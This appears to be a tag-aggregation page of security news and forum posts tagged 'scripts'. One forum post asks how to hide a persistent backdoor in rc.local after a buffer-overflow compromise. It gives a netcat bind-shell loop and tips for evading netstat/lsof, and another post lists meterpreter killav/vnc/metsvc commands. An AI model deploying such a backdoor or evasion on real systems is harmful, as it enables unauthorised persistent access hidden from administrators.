«
Expand/Collapse
42 items tagged "scripts"
Related tags:
txt [+],
sql injection [+],
directory [+],
sql [+],
plus [+],
php [+],
feed [+],
classified ads [+],
classified [+],
web scripts [+],
web [+],
tss [+],
manager pro [+],
feed business [+],
xss [+],
windows [+],
rpsa [+],
rentals [+],
remote shell [+],
registry entries [+],
reddit [+],
rapidleech [+],
openssl [+],
netsolution [+],
message templates [+],
matrimonial [+],
local information [+],
information disclosure vulnerability [+],
human readable format [+],
hotweb [+],
grokevt [+],
event [+],
bugtraq [+],
authentication [+],
acpid [+],
vulnerability [+],
webdesign [+],
vulnerabilities [+],
usa [+],
tainos [+],
something [+],
showprogram [+],
setup [+],
scriptsfeed [+],
robert [+],
remote [+],
profit [+],
out [+],
multiple [+],
mojma [+],
misc [+],
meterpreter [+],
looks [+],
login [+],
info [+],
inclusion [+],
htaccess scripts [+],
hardening [+],
hansen [+],
hacks [+],
hacker [+],
hack [+],
guestbook php [+],
guestbook [+],
game [+],
file [+],
figures [+],
directory software [+],
directory info [+],
dating software [+],
dating [+],
connectionnotestablished [+],
business directory [+],
business [+],
buffer overflow [+],
black hat [+],
backdoor [+],
apache [+],
activerecord [+],
Support [+],
Newbie [+],
General [+],
BackTrack [+],
Area [+]
-
-
15:12
»
Packet Storm Security Recent Files
GrokEVT is a collection of scripts for reading Windows event log files on Unix. The scripts work together on one or more mounted Windows partitions to extract all information needed (registry entries, message templates, and log files) to convert the logs to a human-readable format.
-
15:12
»
Packet Storm Security Misc. Files
GrokEVT is a collection of scripts for reading Windows event log files on Unix. The scripts work together on one or more mounted Windows partitions to extract all information needed (registry entries, message templates, and log files) to convert the logs to a human-readable format.
-
-
9:08
»
remote-exploit & backtrack
I wanted to get feedback on this subject. I'm taking a class at school where we compromise a box via buffer overflow and then setup a backdoor.
One of the ways I thought of was to check rc.local for any scripts. If there was one, then I would include my backdoor in there with something like
while true; do nc -lp 6666 -e /bin/sh; done
Maybe even renaming nc as something else. But then it would be easily visible to administrators by using lsof -i or netstat -antp. So instead have the script connect to me once it gets run. But then what if the box gets rebooted only once a year. Plus lsof and netstat will still show the established connection. I wanted to see what you guys thought.
Where would you setup your backdoor and why?
-
-
13:34
»
Hack a Day
Looks like someone figured out how to game the Reddit system. This probably has been done before, but as far as we know nobody’s actually shared the methods in detail. [Esrun] wrote some scripts that allow him to register multiple accounts and use them to up-vote stories. The hack goes something like this. A script [...]
-
-
12:29
»
remote-exploit & backtrack
None of the built in meterpreter scripts in my BT4 installation work. I get this error when I try to run any of them:
meterpreter > run killav
[-] Error in script: ActiveRecord::ConnectionNotEstablished ActiveRecord::ConnectionNotEstablished
meterpreter > run vnc
[-] Error in script: ActiveRecord::ConnectionNotEstablished ActiveRecord::ConnectionNotEstablished
meterpreter > run metsvc
[-] Error in script: ActiveRecord::ConnectionNotEstablished ActiveRecord::ConnectionNotEstablished
Has anyone seen this before or have any ideas?
Thanks,
C